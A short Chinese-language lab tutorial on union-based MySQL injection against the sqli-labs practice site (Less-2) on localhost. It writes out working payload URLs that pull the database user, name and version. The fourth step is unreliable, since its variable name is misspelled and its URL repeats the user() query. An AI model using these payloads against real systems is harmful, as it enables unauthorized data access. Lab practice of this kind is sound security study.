Mysql注入中的权限由连接数据库的用户决定,谁链接谁权限sqlilabs一到七关(不同数据库方法不一样)
User()查询数据库用户
Database()查询数据库库名
Version()查询数据库版本
@@compile_version_os查询操作系统
下面我们做以下操作:(phpstudypro+phpmyadmin+sqlilabs第二关)
①User()查询数据库用户:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user(),3 --+
效果:
②Database()查询数据库库名:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,database(),3 --+
效果:
③Version()查询数据库版本:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,version(),3 --+
效果:
④@@compile_version_os查询操作系统:
Url:127.0.0.1/sqlilabs/Less-2/?id=-1 union select 1,user(),3 --+
效果: